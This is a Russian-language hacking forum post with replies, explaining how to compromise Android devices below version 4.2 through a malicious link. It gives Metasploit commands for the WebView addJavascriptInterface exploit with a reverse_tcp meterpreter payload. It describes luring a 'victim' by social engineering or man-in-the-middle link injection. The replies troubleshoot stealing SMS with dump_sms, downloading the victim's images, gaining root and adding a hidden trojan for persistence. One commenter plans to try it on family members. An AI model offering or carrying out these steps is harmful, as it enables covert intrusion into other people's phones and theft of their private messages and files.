Статья Android WebView Exploit или взлом андроида по ссылке

Итак всем привет.Пост для совсем новичков)) Бывалые наверняка его юзали, но тут на форуме описания этого эсплойта еще не видел)
Сегодня мы узнаем о еще одном очень легком способе взлома андроид устройств версии не больше (4.2.x)

Если устройства с андроидом выше версии то смотрите эту статью

И так если вы обнаружили в своем сегменте сети (на одном WiFi к примеру ) или заведомо известно что ваша жертва использует девайс на андроиде версии ниже чем 4.2.x то этот эксплоит вам подойдет.

И так все что нам понадобиться:

1) Запустить метасплоит
2) Выбираем наш эксплойт:

use exploit/android/browser/webview_addjavascriptinterface

3) Задаем опционально LHOST , LPORT для пейлоада,который по дефолту тот что нам нужен(android/meterpreter/reverse_tcp) URIPATH - текст ссылки который будет идти после IP ,SRVHOST и SRVPORT соотведственно IP и порт на котором будет запущен веб сервер.

команды метасплоит

set LHOST наш_ip_адрес
set LPORT наш_порт_на_котором_будем_ловить_соединение
set SRVHOST IP__наш_адрес
set URIPATH текст_ссылки
exploit -j

4) Применяем Соц.Инженерии и даем ссылку жертве или заражаем трафик при МИТМ атаках с инжектом вредоносной ссылки...

5)Ловим метерпретер сессию

 

[ApplePen]

Я вчера заводил этот эксплоит на 4.4, Lenovo a806

 

[xxxcrow]

ребят, что то у меня ссылку не открывает
в чем проблема?

 

[<~DarkNode~>]

ребят, что то у меня ссылку не открывает
в чем проблема?

Опишите более подробно свою проблему.
И было бы неплохо прикрепить скриншот проблемы.

 

[xxxcrow]

Опишите более подробно свою проблему.
И было бы неплохо прикрепить скриншот проблемы.

простите, уже все нормально))
ток сейчас проблема, не могу сделать почти ничего, ни дампы не какие, не геолокацию,
мне кажется это изза того что я priv не могу поставить, говорит что такого фала нет

 

[<~DarkNode~>]

Можно предположить что неверно прописаны пути к сохраняемым дампап. Часто это может происходить когда в пути к файлу встречаются пробелы.В таких случаях нужно просто использовать символ слэша \
Путь к файлу будет выглядит примерно так:

/root/Рабочий\ Стол\sms.txt

 

[xxxcrow]

Опишите более подробно свою проблему.
И было бы неплохо прикрепить скриншот проблемы.

сейчас у меня вот так :С

Можно предположить что неверно прописаны пути к сохраняемым дампап. Часто это может происходить когда в пути к файлу встречаются пробелы.В таких случаях нужно просто использовать символ слэша \
Путь к файлу будет выглядит примерно так:

/root/Рабочий\ Стол\sms.txt

помоему ты не правильно написал))
а еще что то по русский не писалось, и я в итоге вот так сделал, но все ровно:

 

[<~DarkNode~>]

Тогда извини)

помоему ты не правильно написал))
а еще что то по русский не писалось, и я в итоге вот так сделал, но все ровно:

Попробуй выполнить команду dump_sms с параметром -o

dump_sms -o /root/sms.txt

 

[xxxcrow]

Тогда извини)

Попробуй выполнить команду dump_sms с параметром -o

dump_sms -o /root/sms.txt

тоже самое, и так с большенством команд,
хотя все 1-в-1 делаю как в туториалах (даже как и сам создатель метасплойта(или метерпетера))
позже попробую с другим телефоном, странно что на этом не работает нормально
(могу менять файлы и прочее, а вот что то дельное нет, не местоположения ни чего остального подобного)

 

[xxxcrow]

Тогда извини)

Попробуй выполнить команду dump_sms с параметром -o

dump_sms -o /root/sms.txt

кароче, есть предположение что у метерпретера нет доступа к руту, вот что
как сделать?
и еще вопрос, как СКАЧАТЬ изображение допустим, ну на комп свой?

Тогда извини)

Попробуй выполнить команду dump_sms с параметром -o

dump_sms -o /root/sms.txt

а еще как я понял, после перезагрузки все теряется? :О

 

[<~DarkNode~>]

а еще как я понял, после перезагрузки все теряется? :О

Что именно понимается под словом "Все" ?
Метасплоит запущен от рута?

и еще вопрос, как СКАЧАТЬ изображение допустим, ну на комп свой?

В метерпретере есть команда download

 

[xxxcrow]

Что именно понимается под словом "Все" ?
Метасплоит запущен от рута?

В метерпретере есть команда download

метасплоит от рута, да, под словом все подрузамевается ну сессия и сам бекдор ._.

(на счет скачивания разобрался уже)))

(я даже только что выгрузил скрипт что бы рут получить для метерпретера)

 

[<~DarkNode~>]

под словом все подрузамевается ну сессия и сам бекдор

Ну естественно,на сегодняшний день мне пока не известно эксплоитов в метасплоите под андроид , да и в целом, которые при эксплуатации сразу же закрепляются в системе.Как минимум это достигается различными модулями пост эксплуатации.

 

[xxxcrow]

Ну естественно,на сегодняшний день мне пока не известно эксплоитов в метасплоите под андроид , да и в целом, которые при эксплуатации сразу же закрепляются в системе.Как минимум это достигается различными модулями пост эксплуатации.

а как закрепить? (в голове только одна мысль, сделать бекдор, ток вот как его установить?)

 

[<~DarkNode~>]

а как закрепить? (в голове только одна мысль, сделать бекдор, ток вот как его установить?)

https://codeby.net/threads/sobiraem-skrytyj-trojan-na-android-persistence-chast-i.58392/

 

[xxxcrow]

Собираем скрытый троян на Android(persistence) Часть I

а как его установить то? через данный эксплойт

Собираем скрытый троян на Android(persistence) Часть I

execute -f
?

 

[<~DarkNode~>]

execute -f
?

Прочитай заголовок статьи, думаю логика очевидна что речь идет не про готовый эксплойт из метасплойта, а про то как создать свой бекдор с последующим бекконнектом.
Что бы достигать целей,нужно немного понимать что и как работает,а не просто один в один по мануалу делать и удивляться почему на выходе ошибка или что то не так)))

 

[xxxcrow]

Прочитай заголовок статьи, думаю логика очевидна что речь идет не про готовый эксплойт из метасплойта, а про то как создать свой бекдор с последующим бекконнектом.
Что бы достигать целей,нужно немного понимать что и как работает,а не просто один в один по мануалу делать и удивляться почему на выходе ошибка или что то не так)))

ну а серьезно)) через данный эксплойт можно загрузить и установить апкашник (вроде как да, но у меня не устанавливается, поэтому не доконца понимаю все верно ли))

 

[<~DarkNode~>]

Еще советую освоить что такое Эксплоит и почитать описания WebView Exploit в самом метасплоите.
И тогда вопросов станет меньше ))

 

[MrFreemind]

Интересная статья, благодарю. Обязательно нужно потестить на домашних.